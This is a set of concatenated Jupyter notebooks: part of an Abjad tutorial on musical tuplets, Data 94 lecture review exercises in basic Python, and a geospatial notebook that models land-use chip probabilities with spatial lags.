This last tuplet is an augmentation in which each of the written sixteenth notes lasts for 4/3rds of its written duration. The sounding result would be identical, and these are just two ways of writing the same thing, the former of which happens to be conventional. Remember that object-oriented programming gives us objects with characteristics and behaviors. We can use the dot-chaining syntax to read and write the tuplet's multiplier attribute:
###Code
tuplet = Tuplet(Multiplier(2, 3), "fs'8 g' r8")
tuplet.multiplier
tuplet.multiplier = Multiplier(4, 5)
tuplet
show(tuplet)
###Output
_____no_output_____
###Markdown
Adding Leaves The multiplier is a reasonable characteristic for our tuplet to have, but what about behaviors? Well, you probably want to be able to build up tuplets by adding leaves to them, one or several a time. The append method adds leaves to the end of a tuplet (and to any Python list), one leaf at a time:
###Code
tuplet.append(Note("e'4."))
show(tuplet)
###Output
_____no_output_____
###Markdown
...or using a LilyPond string:
###Code
tuplet.append("bf8")
show(tuplet)
###Output
_____no_output_____
###Markdown
Likewise, the extend method adds two or more leaves at a time:
###Code
notes = [Note("fs'32"), Note("e'32"), Note("d'32"), Rest((1, 32))]
tuplet.extend(notes)
show(tuplet)
###Output
_____no_output_____
###Markdown
And you can use a LilyPond string with extend, too:
###Code
tuplet.extend("gs'8 a8")
show(tuplet)
###Output
_____no_output_____
###Markdown
Removing Leaves You can remove tuplet components by reference using the remove method:
###Code
tuplet.remove(tuplet[3])
show(tuplet)
###Output
_____no_output_____
###Markdown
If you want to remove a component by index and then keep it to do something else with it, use the pop method instead of remove:
###Code
popped = tuplet.pop(2)
show(tuplet)
###Output
_____no_output_____
###Markdown
Indexing Leaves Tuplets support indexing, if you'd like to do something to the nth component of a tuplet:
###Code
tuplet[1]
###Output
_____no_output_____
###Markdown
If you've added an existing list to a tuplet's components, and you'd like to see where a component of that list is in the tuplet, you can use the tuplet's index method - in our case, we'll use our notes list from above:
###Code
notes
notes[1]
tuplet.index(notes[1])
###Output
_____no_output_____
###Markdown
The second item in our notes list is the seventh component in our tuplet.
###Code
show(tuplet)
###Output
_____no_output_____
###Markdown
Making Tuplets from Durations and Ratios The Tuplet class also provides a method for constructing a tuplet from a duration and a ratio, where the ratio is a list of integers, the sum of which determines the number of equally spaced pulses within the duration:
###Code
tuplet = Tuplet.from_duration_and_ratio((1,4), [1,3,1])
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
This might not seem like much, but we can write functions that use these kinds of basic functionalities to do more complicated things, like we'll do in this next example, taken from a real score: Brian Ferneyhough - Unsichtbare Farben Mikhial Malt analyzes the rhythmic materials of Ferneyhough’s solo violin composition, Unsichtbare Farben, in The OM Composer’s Book 2.Malt explains that Ferneyhough used OpenMusic to create an “exhaustive catalogue of rhythmic cells” such that:Each cell consists of the same duration divided into two pulses related by a durational proportion ranging from 1:1 to 1:11.The second pulse is then subdivided successively into 1, 2, 3, 4, 5 and 6 equal parts.Let’s recreate Malt’s results in Abjad. The Proportions We use a list comprehension to describe a list of (1,n) tuples, each of which will describe the durational proportion between a cell's first and second pulse:
###Code
proportions = [(1, n) for n in range(1, 11 + 1)]
proportions
###Output
_____no_output_____
###Markdown
The Transforms Next we’ll show how to divide a quarter note into various ratios, and then divide the final logical tie of the resulting tuplet into yet another ratio:
###Code
def make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
):
r'''Makes nested tuplet.
'''
outer_tuplet = Tuplet.from_duration_and_ratio(
tuplet_duration, outer_tuplet_proportions)
inner_tuplet_proportions = inner_tuplet_subdivision_count * [1]
last_leaf = next(iterate(outer_tuplet).by_leaf())
right_logical_tie = inspect_(last_leaf).get_logical_tie()
right_logical_tie.to_tuplet(inner_tuplet_proportions)
return outer_tuplet
###Output
_____no_output_____
###Markdown
And of course it's easier to see what this function does with an example of use:
###Code
tuplet = make_nested_tuplet(Duration(1, 4), (1, 1), 5)
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
We see that a duration of a quarter note (the first argument) has been divided into two pulses with a durational proportion of 1:1 (second argument), the second pulse of which has then been divided into five equally spaced parts (the third argument). Try changing the arguments and see what happens.
###Code
tuplet = make_nested_tuplet(Duration(1, 4), (2, 1), 5)
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
tuplet = make_nested_tuplet(Duration(1, 4), (3, 1), 5)
staff = scoretools.Staff([tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
Logical Ties Solve the Problem of Five A logical tie is a selection of notes or chords connected by ties. It lets us talk about a notated rhythm of 5/16, for example, which can not be expressed with only a single leaf.Note how we can divide a tuplet whose outer proportions are 3/5, where the second logical tie requires two notes to express the 5/16 duration:
###Code
outer_tuplet = Tuplet.from_duration_and_ratio(Duration(1, 4), (3, 5))
staff = scoretools.Staff([outer_tuplet], context_name='RhythmicStaff')
show(staff)
subdivided_tuplet = make_nested_tuplet(Duration(1, 4), (3, 5), 3)
staff = scoretools.Staff([subdivided_tuplet], context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
Do you see which objects and methods in our make_nested_tuplet function convert a logical tie into a tuplet? The Rhythms Now that we know how to make the basic building block, let’s make a lot of tuplets all at once.We’ll set the duration of each tuplet equal to a quarter note:
###Code
duration = Fraction(1,4)
###Output
_____no_output_____
###Markdown
Reusing our make_nested_tuplet function, we make one row of rhythms, with the last logical tie increasingly subdivided:
###Code
def make_row_of_nested_tuplets(
tuplet_duration,
outer_tuplet_proportions,
column_count,
):
r'''Makes row of nested tuplets.
'''
assert 0 < column_count
row_of_nested_tuplets = []
for n in range(column_count):
inner_tuplet_subdivision_count = n + 1
nested_tuplet = make_nested_tuplet(
tuplet_duration,
outer_tuplet_proportions,
inner_tuplet_subdivision_count,
)
row_of_nested_tuplets.append(nested_tuplet)
return row_of_nested_tuplets
tuplets = make_row_of_nested_tuplets(duration, (2, 1), 6)
staff = scoretools.Staff(tuplets, context_name='RhythmicStaff')
show(staff)
###Output
_____no_output_____
###Markdown
If we can make one single row of rhythms, we can make many rows of rhythms. We reuse this last function to make another function:
###Code
def make_rows_of_nested_tuplets(tuplet_duration, row_count, column_count):
r'''Makes rows of nested tuplets.
'''
assert 0 < row_count
rows_of_nested_tuplets = []
for n in range(row_count):
outer_tuplet_proportions = (1, n + 1)
row_of_nested_tuplets = make_row_of_nested_tuplets(
tuplet_duration, outer_tuplet_proportions, column_count)
rows_of_nested_tuplets.append(row_of_nested_tuplets)
return rows_of_nested_tuplets
score = Score()
for tuplet_row in make_rows_of_nested_tuplets(duration, 4, 6):
score.append(scoretools.Staff(tuplet_row, context_name='RhythmicStaff'))
show(score)
###Output
_____no_output_____ |
lecture/lec10/lec10.ipynb | ###Markdown
Lecture 10 – More Review Data 94, Spring 2021 Stock prices Part 1**Task:** Given a list of prices of a stock on a single day, return a string describing whether the stock increased, stayed the same, or decreased from its starting price.
###Code
def daily_change(prices):
first = prices[0]
last = prices[-1]
if first > last:
return 'decrease'
elif first == last:
return 'none'
else:
return 'increase'
# Returns 'increase', since 1 < 4
daily_change([1, 2, 2.5, 3, 3.5, 4])
# Returns 'none', since 3 = 3
daily_change([3, 9, 3])
# Return 'decrease', since 5 > 2
daily_change([5, 4, 3, 4, 5, 4, 3, 2, 2])
###Output
_____no_output_____
###Markdown
Part 2, Quick Check 1**Task:** Given a list of prices of a stock on a single day, return `True` if the stock was strictly increasing, and `False` otherwise. A list of numbers is strictly increasing if each one is larger than the previous.
###Code
def strictly_increasing(prices):
i = 0
while i < len(prices) - 1:
if ...:
return False
i += 1
return True
# True
# strictly_increasing([1, 2, 5, 8, 10])
# False
# strictly_increasing([2, 3, 9, 7, 11])
# False
# strictly_increasing([2, 3, 4, 4, 5])
###Output
_____no_output_____
###Markdown
Next day of the week
###Code
def next_day(day):
week = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
curr = week.index(day)
return week[(curr + 1) % 7]
next_day('Wednesday')
next_day('Saturday')
###Output
_____no_output_____
###Markdown
Prefixes, Quick Check 2
###Code
def full_prefix(name):
# i and idx are short for "index"
idx = name.index('.')
prefix = name[:idx]
rest = ...
if prefix == 'Dr':
return 'Doctor ' + rest
elif prefix == 'Prof':
return 'Professor ' + rest
elif prefix == 'Gov':
return 'Governor ' + rest
else:
return name
# 'Governor Newsom'
# full_prefix('Gov. Newsom')
# 'Professor Christ'
# full_prefix('Prof. Christ')
# 'Doctor Biden'
# full_prefix('Dr. Biden')
# 'Hon. Caboto'
# full_prefix('Hon. Caboto')
###Output
_____no_output_____
###Markdown
Kaprekar's constant
###Code
# For now, ignore the code in this cell.
def increase_sort(n):
n_list = list(str(n))
n_list_sorted = sorted(n_list)
n_str_sorted = ''.join(n_list_sorted)
return int(n_str_sorted)
def decrease_sort(n):
n_list = list(str(n))
n_list_sorted = sorted(n_list)[::-1]
n_str_sorted = ''.join(n_list_sorted)
return int(n_str_sorted)
def find_sequence(n):
# Need to keep track of the steps, and the "current" number in our sequence
steps = [n]
curr = n
# As long as our current number isn't 495
# make one more step, and store the current step
while curr != 495:
curr = decrease_sort(curr) - increase_sort(curr)
steps.append(curr)
return steps
find_sequence(813)
find_sequence(215)
###Output
_____no_output_____ |
ai_experiments/sp_model_chip_probabilities.ipynb | ###Markdown
Modelling of chip probabilities
###Code
import pandas, geopandas
import os, json
from sklearn.ensemble import (
RandomForestClassifier,
GradientBoostingClassifier,
HistGradientBoostingClassifier
)
from sklearn.model_selection import GridSearchCV
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import tools_chip_prob_modelling as tools
###Output
ERROR 1: PROJ: proj_create_from_database: Open of /opt/conda/share/proj failed
###Markdown
Data Probabilities Probabilities for each category by chip, as produced by the neural network:
###Code
probs = geopandas.read_parquet('/home/jovyan/data/32_nw_pred.parquet')
###Output
_____no_output_____
###Markdown
We also keep the names of all classes separate and semantically sorted as it'll come in handy afterwards:
###Code
tools.class_names
###Output
_____no_output_____
###Markdown
Labels Proportions of observed classes per chip. They are aligned with `probs` so we can remove the `geometry` column.
###Code
labels = pandas.read_parquet(
'/home/jovyan/data/chip_proportions.pq'
).drop('geometry', axis=1)
###Output
_____no_output_____
###Markdown
These are encoded in following a grouping described in the JSON model file:
###Code
cd2nm = tools.parse_nn_json(
'/home/jovyan/data/efficientnet_pooling_256_12.json'
)
###Output
_____no_output_____
###Markdown
We replace the code in `labels` by the name and aggregate by column names so we have the proportions in each chip by name rather than code:
###Code
relabels = labels.rename(columns=cd2nm).groupby(level=0, axis=1).sum()
###Output
_____no_output_____
###Markdown
`relabels` contains a few rows with a total probability sum of 0: these are chips that fall within the water. We remove them:
###Code
relabels_nw = relabels[relabels.sum(axis=1) > 0.5] # 0.5 to avoid rounding errors
###Output
_____no_output_____
###Markdown
To begin with, we focus on single class chips. We identify which are single class:
###Code
single_class = relabels_nw.where(relabels_nw==1).sum(axis=1).astype('bool')
single_class.sum() * 100 / single_class.shape[0] # Pct single class
###Output
_____no_output_____
###Markdown
And then pull the class for each of them:
###Code
label = pandas.Categorical(relabels_nw.idxmax(axis=1))
###Output
_____no_output_____
###Markdown
Build `db_all` Single table with probabilities, labels and single-class flag:
###Code
db_all = probs.join(
pandas.DataFrame({'label': label, 'single_class': single_class})
)
db_all['single_class'] = db_all['single_class'].fillna(False)
###Output
_____no_output_____
###Markdown
Note not all chips have a `label` and `single_class` value. To make sure they are consistent, we replace the `N/A` in `single_class` by a `False`. Train/Validation split Next, we split the sample into train and validation sets. The training split proportion is set by the global parameter `TRAIN_FRAC`.
###Code
db_all['train_all'] = False
db_all.loc[
db_all.sample(frac=tools.TRAIN_FRAC, random_state=1234).index, 'train_all'
] = True
###Output
_____no_output_____
###Markdown
Spatial lag Overview Some models will include spatial context. Here we calculate these measures through the spatial lag of the probability for each class. Given we are in a train/validation split context, there are two ways to approach the construction of the lag:1. [`wa`] Absolute lag: we first calculate the lag for each chip, then split between train/validation. This ensures the lag is representative of the geographic context on the ground, but runs the risk of spilling information between train and validation samples. We say here "runs the risk" because the validation chips are _not_ used as focal chips for training and thus the model does not "see" them as such. However, validation chips are _also_ seen by the model as context, and that does make information cross between the sets. We consider this option as a way to explore the extent of this issue. One complication is that this approach also provides more information about geographic context. In the vent these models had higher performance (likely), it might not be clear which source is driving the boost: the better representation of geographic context, or the information cross-over between train and validation sets.1. [`ws`] Split lag: here we start by splitting the set into train/validation and then we calculate the spatial lag separately. This is a cleaner way to assess performance, but also one that distorts geographical context so might potentially perform worse than a model that could include a better representation.1. [`wbs`] Block split lag: here we use a different train/validation split that relies on blocks of 3x3 chips to not be separated. Also, we only use focal chips for model fitting and evaluation. This ensures a clean cut between train/val _and_ full geographic context, at the expense of less observations in the model.After discussions, we have decided to start with `ws`. Upon further reflection, `wa` implies a clear case of "leakage" of information from the validation into the training sets, and thus "pollutes" the estimates of accuracy. The `wbs` remains valid but two caveats apply: a) a proper implementation of the approach results in an important loss of observations (for every 3x3 block of chips, only one of them enters the modeling), and this probably has an important effect on smaller classes such as the urbanities; b) at a theoretical level, it is still not clear it's the preferred approach (see [Wadoux et al. 2021](https://www.sciencedirect.com/science/article/pii/S0304380021002489?via=ihub); for context). On this last point, my (DA-B) sense is that it still makes sense to block in smaller chunks and split those between train and validation because you want to ensure that the effect of context is characterised adequately, and the risk of not picking up the variation desired in both training and validation sets (the main concern of Wadoux et al. 2021) is lessened by blocking at a relatively small scale and randomly sampling from those Split lag
###Code
lag_all = db_all.groupby('train_all').apply(
tools.lag_columns, cols=tools.class_names
)
###Output
/opt/conda/lib/python3.9/site-packages/libpysal/weights/weights.py:172: UserWarning: The weights matrix is not fully connected:
There are 4895 disconnected components.
There are 1771 islands with ids: 11, 13, 14, 15, 28, 44, 46, 52, 53, 66, 71, 140, 156, 175, 185, 189, 195, 209, 219, 292, 293, 333, 342, 359, 398, 425, 432, 436, 452, 477, 480, 481, 521, 537, 561, 582, 596, 597, 599, 627, 629, 654, 656, 688, 804, 841, 860, 885, 896, 936, 975, 1001, 1010, 1074, 1140, 1149, 1181, 1182, 1183, 1185, 1186, 1197, 1198, 1218, 1227, 1228, 1229, 1230, 1272, 1273, 1284, 1294, 1296, 1300, 1346, 1357, 1386, 1408, 1413, 1489, 1502, 1503, 1509, 1518, 1519, 1521, 1541, 1564, 1595, 1603, 1612, 1707, 1710, 1711, 1754, 1868, 1870, 1874, 1884, 1894, 1921, 1942, 1943, 1953, 1955, 1956, 1957, 1965, 1969, 1981, 1985, 2032, 2036, 2067, 2105, 2120, 2121, 2125, 2126, 2133, 2166, 2187, 2206, 2217, 2220, 2226, 2228, 2280, 2325, 2337, 2352, 2372, 2386, 2435, 2449, 2457, 2473, 2480, 2492, 2515, 2533, 2560, 2561, 2562, 2570, 2584, 2587, 2596, 2607, 2710, 2711, 2733, 2742, 2756, 2765, 2781, 2817, 2819, 2820, 2828, 2851, 2864, 2868, 2874, 2885, 2887, 2890, 2891, 2892, 2893, 2894, 2918, 2924, 2926, 2942, 2957, 2962, 2980, 3022, 3025, 3026, 3054, 3057, 3117, 3140, 3142, 3143, 3146, 3174, 3203, 3238, 3284, 3308, 3309, 3315, 3340, 3341, 3342, 3356, 3374, 3384, 3389, 3432, 3529, 3536, 3550, 3551, 3557, 3582, 3595, 3616, 3644, 3645, 3680, 3689, 3696, 3724, 3752, 3771, 3777, 3783, 3788, 3830, 3831, 3832, 3859, 3915, 3916, 3988, 3998, 4011, 4036, 4041, 4042, 4067, 4068, 4069, 4080, 4097, 4098, 4123, 4135, 4196, 4203, 4204, 4218, 4220, 4224, 4230, 4231, 4232, 4246, 4251, 4257, 4258, 4282, 4287, 4292, 4387, 4393, 4398, 4417, 4446, 4475, 4498, 4504, 4516, 4548, 4574, 4579, 4604, 4616, 4622, 4623, 4647, 4648, 4656, 4661, 4667, 4680, 4699, 4718, 4765, 4778, 4807, 4820, 4850, 4868, 4877, 4878, 4879, 4888, 4921, 4948, 4957, 4958, 4971, 4983, 4984, 5005, 5030, 5031, 5039, 5042, 5083, 5089, 5091, 5135, 5139, 5154, 5168, 5173, 5184, 5192, 5226, 5279, 5288, 5305, 5306, 5310, 5337, 5383, 5403, 5424, 5451, 5495, 5500, 5549, 5553, 5585, 5589, 5632, 5679, 5692, 5693, 5695, 5717, 5760, 5866, 5872, 5962, 5982, 5989, 5991, 6004, 6005, 6018, 6047, 6053, 6055, 6064, 6141, 6206, 6210, 6211, 6240, 6251, 6262, 6264, 6292, 6328, 6331, 6332, 6350, 6360, 6391, 6394, 6441, 6442, 6448, 6452, 6458, 6469, 6484, 6508, 6511, 6525, 6537, 6561, 6568, 6585, 6600, 6640, 6683, 6684, 6686, 6687, 6702, 6711, 6723, 6742, 6757, 6774, 6812, 6816, 6826, 6848, 6863, 6873, 6896, 6934, 6969, 6970, 6971, 6989, 7014, 7049, 7050, 7051, 7087, 7093, 7105, 7166, 7167, 7173, 7212, 7216, 7235, 7240, 7265, 7274, 7275, 7304, 7350, 7351, 7359, 7363, 7378, 7386, 7387, 7453, 7466, 7468, 7476, 7487, 7504, 7538, 7564, 7568, 7569, 7597, 7616, 7617, 7638, 7641, 7642, 7644, 7648, 7649, 7650, 7651, 7665, 7666, 7673, 7690, 7693, 7704, 7708, 7760, 7774, 7775, 7781, 7801, 7802, 7811, 7812, 7813, 7814, 7831, 7854, 7858, 7920, 7965, 7966, 8006, 8012, 8013, 8024, 8025, 8031, 8038, 8078, 8079, 8097, 8113, 8128, 8133, 8140, 8188, 8193, 8215, 8216, 8246, 8249, 8250, 8252, 8253, 8258, 8290, 8303, 8314, 8337, 8338, 8362, 8368, 8410, 8476, 8477, 8489, 8490, 8509, 8516, 8523, 8533, 8538, 8543, 8563, 8637, 8672, 8679, 8722, 8723, 8739, 8744, 8798, 8811, 8840, 8878, 8896, 8917, 8927, 8928, 8978, 8988, 9024, 9047, 9052, 9083, 9085, 9099, 9196, 9211, 9219, 9220, 9226, 9270, 9296, 9297, 9299, 9325, 9342, 9399, 9406, 9412, 9413, 9437, 9475, 9480, 9486, 9522, 9536, 9538, 9544, 9546, 9561, 9562, 9566, 9567, 9648, 9656, 9663, 9666, 9677, 9686, 9688, 9690, 9761, 9773, 9781, 9788, 9879, 9894, 9931, 9939, 9942, 9943, 9955, 10004, 10037, 10043, 10084, 10089, 10113, 10157, 10162, 10163, 10189, 10192, 10229, 10255, 10289, 10296, 10320, 10333, 10380, 10441, 10444, 10445, 10446, 10448, 10455, 10483, 10494, 10495, 10496, 10505, 10527, 10528, 10538, 10543, 10561, 10598, 10599, 10604, 10605, 10629, 10657, 10658, 10685, 10696, 10725, 10743, 10772, 10775, 10843, 10844, 10846, 10866, 10898, 10942, 10943, 10954, 11015, 11036, 11052, 11055, 11056, 11078, 11084, 11091, 11109, 11144, 11175, 11187, 11205, 11237, 11248, 11270, 11310, 11318, 11332, 11335, 11358, 11370, 11372, 11403, 11450, 11453, 11462, 11471, 11516, 11517, 11518, 11542, 11565, 11566, 11604, 11619, 11662, 11676, 11700, 11743, 11745, 11799, 11835, 11862, 11864, 11885, 11901, 11915, 11971, 11973, 11974, 11975, 11976, 11998, 12002, 12019, 12026, 12034, 12040, 12072, 12073, 12083, 12084, 12125, 12126, 12151, 12153, 12176, 12195, 12200, 12213, 12215, 12230, 12247, 12248, 12281, 12283, 12287, 12307, 12308, 12317, 12379, 12381, 12405, 12410, 12456, 12460, 12474, 12492, 12526, 12539, 12577, 12589, 12604, 12605, 12636, 12656, 12665, 12692, 12693, 12702, 12723, 12726, 12836, 12848, 12851, 12891, 12898, 12901, 12910, 12911, 12913, 12920, 12932, 12937, 12938, 12939, 12953, 12998, 13000, 13001, 13021, 13022, 13034, 13042, 13043, 13054, 13062, 13063, 13089, 13107, 13116, 13129, 13154, 13159, 13169, 13196, 13204, 13207, 13238, 13239, 13256, 13353, 13354, 13355, 13399, 13406, 13407, 13432, 13440, 13442, 13443, 13463, 13493, 13514, 13542, 13562, 13603, 13651, 13653, 13659, 13670, 13681, 13683, 13691, 13700, 13766, 13773, 13779, 13782, 13783, 13790, 13814, 13834, 13835, 13885, 13925, 13926, 13940, 13945, 13964, 13969, 13997, 14016, 14021, 14029, 14031, 14038, 14043, 14057, 14067, 14106, 14119, 14131, 14135, 14136, 14152, 14173, 14174, 14175, 14196, 14199, 14200, 14302, 14341, 14344, 14347, 14352, 14353, 14357, 14403, 14413, 14490, 14539, 14576, 14580, 14586, 14599, 14606, 14649, 14654, 14683, 14755, 14756, 14766, 14779, 14785, 14790, 14803, 14832, 14845, 14891, 14899, 14900, 14901, 14916, 14929, 14935, 14946, 14993, 15051, 15091, 15102, 15173, 15185, 15207, 15208, 15291, 15302, 15361, 15373, 15376, 15377, 15386, 15392, 15416, 15468, 15526, 15527, 15533, 15543, 15562, 15577, 15591, 15592, 15612, 15644, 15692, 15695, 15699, 15707, 15708, 15725, 15751, 15754, 15773, 15788, 15824, 15832, 15882, 15889, 15913, 15914, 15924, 15925, 15966, 15970, 15974, 15979, 16016, 16061, 16065, 16154, 16167, 16177, 16190, 16199, 16202, 16207, 16215, 16240, 16241, 16242, 16243, 16294, 16329, 16400, 16401, 16408, 16426, 16437, 16443, 16444, 16447, 16475, 16479, 16500, 16501, 16511, 16545, 16546, 16599, 16637, 16666, 16669, 16731, 16795, 16799, 16855, 16856, 16895, 16922, 16923, 16948, 16950, 16953, 17025, 17029, 17043, 17044, 17071, 17081, 17083, 17088, 17103, 17136, 17216, 17235, 17364, 17365, 17367, 17387, 17425, 17430, 17441, 17463, 17464, 17468, 17487, 17497, 17498, 17525, 17529, 17533, 17578, 17665, 17674, 17678, 17692, 17726, 17727, 17728, 17734, 17738, 17739, 17742, 17798, 17821, 17831, 17837, 17896, 17903, 17914, 17925, 17954, 17955, 17957, 17974, 18019, 18022, 18053, 18060, 18115, 18116, 18141, 18184, 18189, 18206, 18218, 18226, 18237, 18239, 18262, 18267, 18317, 18364, 18371, 18372, 18390, 18391, 18402, 18405, 18409, 18439, 18458, 18462, 18468, 18495, 18511, 18522, 18532, 18539, 18540, 18547, 18548, 18597, 18626, 18632, 18689, 18728, 18734, 18739, 18742, 18752, 18788, 18828, 18834, 18835, 18842, 18843, 18887, 18903, 18910, 18914, 18938, 18965, 18968, 19015, 19023, 19038, 19053, 19060, 19068, 19080, 19081, 19094, 19096, 19123, 19124, 19199, 19212, 19230, 19261, 19303, 19327, 19365, 19381, 19382, 19386, 19388, 19404, 19433, 19437, 19446, 19488, 19489, 19497, 19498, 19541, 19549, 19552, 19592, 19602, 19649, 19679, 19735, 19792, 19804, 19809, 19810, 19811, 19814, 19821, 19832, 19838, 19919, 19944, 19965, 19979, 20008, 20042, 20043, 20047, 20048, 20055, 20058, 20061, 20097, 20105, 20110, 20111, 20143, 20147, 20152, 20157, 20158, 20175, 20216, 20241, 20248, 20266, 20271, 20277, 20278, 20297, 20362, 20376, 20395, 20405, 20410, 20425, 20432, 20439, 20445, 20468, 20495, 20496, 20497, 20505, 20514, 20520, 20523, 20540, 20542, 20543, 20575, 20610, 20628, 20630, 20635, 20636, 20648, 20653, 20686, 20713, 20723, 20725, 20728, 20731, 20756, 20778, 20836, 20874, 20919, 20920, 20930, 20933, 20960, 20968, 20971, 20973, 20988, 20990, 21013, 21044, 21134, 21138, 21173, 21216, 21262, 21277, 21292, 21342, 21344, 21345, 21346, 21352, 21434, 21472, 21477, 21500, 21501, 21538, 21541, 21573, 21574, 21575, 21576, 21599, 21657, 21673, 21680, 21714, 21715, 21719, 21784, 21794, 21821, 21851, 21857, 21867, 21878, 21888, 21915, 21955, 22011, 22054, 22056, 22075, 22087, 22131, 22179, 22218, 22272, 22274, 22276, 22284, 22314, 22335, 22341, 22343, 22347, 22348, 22383, 22414, 22424, 22433, 22436, 22453, 22462, 22492, 22631, 22652, 22696, 22730, 22731, 22732, 22733, 22734, 22744, 22746, 22796, 22807, 22814, 22817, 22847, 22859, 22866, 22917, 22941, 22949, 22976, 22987, 22992, 23024, 23047, 23078, 23093, 23096, 23097, 23124, 23125, 23154, 23159, 23226, 23241, 23255, 23256, 23264, 23265, 23270, 23271, 23272, 23276, 23281, 23282, 23284, 23321, 23398, 23403, 23404, 23442, 23444, 23473, 23515, 23539, 23562, 23573, 23605, 23624, 23639, 23661, 23687, 23779, 23781, 23808, 23817, 23822, 23844, 23857, 23861, 23885, 23906, 23957, 24021, 24022, 24046, 24057, 24111, 24121, 24129, 24158, 24171, 24187, 24243, 24268, 24296, 24354, 24358, 24361, 24378, 24401, 24403, 24472, 24511, 24524, 24548, 24586, 24589, 24627, 24664, 24669, 24680, 24685, 24693, 24737, 24776, 24789, 24801, 24807, 24825, 24828, 24836, 24837, 24861, 24880, 24904, 24915, 24931, 24949, 24981, 24997, 25000, 25001, 25023, 25044, 25081, 25084, 25087, 25106, 25113, 25114, 25149, 25213, 25224, 25287, 25307, 25314, 25351, 25384, 25385, 25392, 25400, 25414, 25415, 25418, 25430, 25435, 25450, 25470, 25487, 25500, 25506, 25512, 25513, 25528, 25529, 25542, 25580, 25583, 25589, 25590, 25600, 25611, 25645, 25647, 25680, 25682, 25697, 25719, 25740, 25759, 25819, 25849, 25853, 25860, 25866, 25867, 25877, 25886, 25887, 25900, 25907, 25912, 25963, 25976, 25977, 26033, 26034, 26088, 26109, 26116, 26117, 26119, 26122, 26136, 26141, 26162, 26198, 26199, 26222, 26243, 26246, 26248, 26251, 26256, 26264, 26278, 26285, 26286, 26287, 26350, 26354, 26374, 26375, 26379, 26380, 26383, 26404, 26413, 26441, 26459, 26479, 26496, 26541, 26552, 26569, 26630, 26690, 26691, 26713, 26716, 26717, 26720, 26721, 26722, 26729, 26741, 26764, 26778, 26797, 26828, 26859, 26976, 26978, 26979, 26980, 27002, 27026, 27050, 27085, 27204, 27205, 27208, 27233, 27286, 27287, 27303, 27325, 27326, 27351, 27358, 27390, 27411, 27420, 27421, 27424, 27469, 27478, 27495, 27496, 27508, 27510, 27519, 27521, 27538, 27546, 27549, 27550, 27566, 27619, 27641, 27643, 27686, 27687, 27688, 27706, 27727, 27739, 27771, 27795, 27817, 27827, 27851, 27869, 27883, 27884, 27886, 27963, 27964, 27968, 27999, 28037, 28039, 28094, 28106, 28134, 28135, 28136, 28143, 28145, 28152, 28218, 28219, 28220, 28234, 28306, 28330, 28337, 28339, 28367, 28379, 28381, 28398, 28410, 28411, 28427, 28435, 28437, 28490, 28546, 28561, 28573, 28582, 28586, 28587, 28592, 28593, 28597, 28598, 28618, 28619, 28623, 28633, 28639, 28644, 28673, 28681, 28682, 28683, 28686, 28717, 28721, 28754, 28758, 28775, 28796, 28798, 28807, 28808, 28859, 28863, 28881, 28899, 28911, 28912, 28913, 28920, 28967, 28994, 29000, 29002, 29019, 29036, 29050, 29081, 29087, 29139, 29140, 29150, 29192, 29194, 29203, 29208, 29216, 29219, 29220, 29222, 29233, 29238, 29262, 29270, 29312, 29331, 29335, 29350, 29371, 29372, 29414, 29416, 29426, 29430, 29477, 29525, 29532, 29573, 29592, 29619, 29620, 29635, 29694, 29704, 29705, 29706, 29708, 29752, 29771, 29774, 29782, 29796, 29821, 29825, 29828, 29862, 29863, 29874, 29878, 29879, 29891, 29892, 29894, 29895, 29921, 29923, 29935, 29939, 29940, 29948, 29978, 29985, 29991, 29994, 29998, 30013, 30025, 30026, 30052, 30099, 30110, 30114, 30115, 30125, 30189, 30196, 30216, 30227, 30288, 30294, 30303, 30317, 30371, 30402, 30406, 30408, 30449, 30450, 30560, 30567, 30588, 30615, 30647, 30670, 30687, 30728, 30729, 30730, 30780, 30781, 30804, 30806, 30823, 30825, 30830, 30832, 30833, 30865, 30878, 30895, 30901.
warnings.warn(message)
###Markdown
To make things handier later, we grab the names of the lagged variables separately:
###Code
w_class_names = ['w_'+i for i in tools.class_names]
###Output
_____no_output_____
###Markdown
Spatially lagging the split chips will give rise to islands (chips that do not have any neighbors). This will mean later on, when we consolidate the table for models, we will have to drop island observations and, if there is a systematic bias in the group (train/val) where we drop more, it might induce further issues down the line.
###Code
sns.displot(
lag_all.assign(
train_all=db_all['train_all'].map({True: "Train", False: "Validation"})
),
x='card',
hue='train_all',
element='step',
aspect=2,
height=3
);
###Output
_____no_output_____
###Markdown
Cardinalities clearly differ: trainining observations (a larger group) has more neighbors on average. This is potentially a problem in that the validation set is _not_ mimmicking the training one. However, the direction of the difference might be such that evaluation metrics could be taken as a _lower_ bound: the model is trained using more information from context but evaluated with less; performance will be evaluated with "worse" conditions than it's been trained on so, everything else being equal, it'd give lower scores than the model actually should.**DA-B**: discuss with MF it is the case
###Code
corrs = tools.build_prob_wprob_corrs(
tools.class_names, w_class_names, db_all, lag_all
)
###Output
_____no_output_____
###Markdown
As an exploration, here we have the correlation between high probability in a given class, and high probability in other classes in the spatial lag (geographic context). There is a clear pattern of non-zero correlations.
###Code
h = sns.heatmap(corrs, vmin=0, vmax=1, cmap='viridis')
h.set_xticklabels(h.get_xticklabels(), rotation = 45, ha="right");
###Output
_____no_output_____
###Markdown
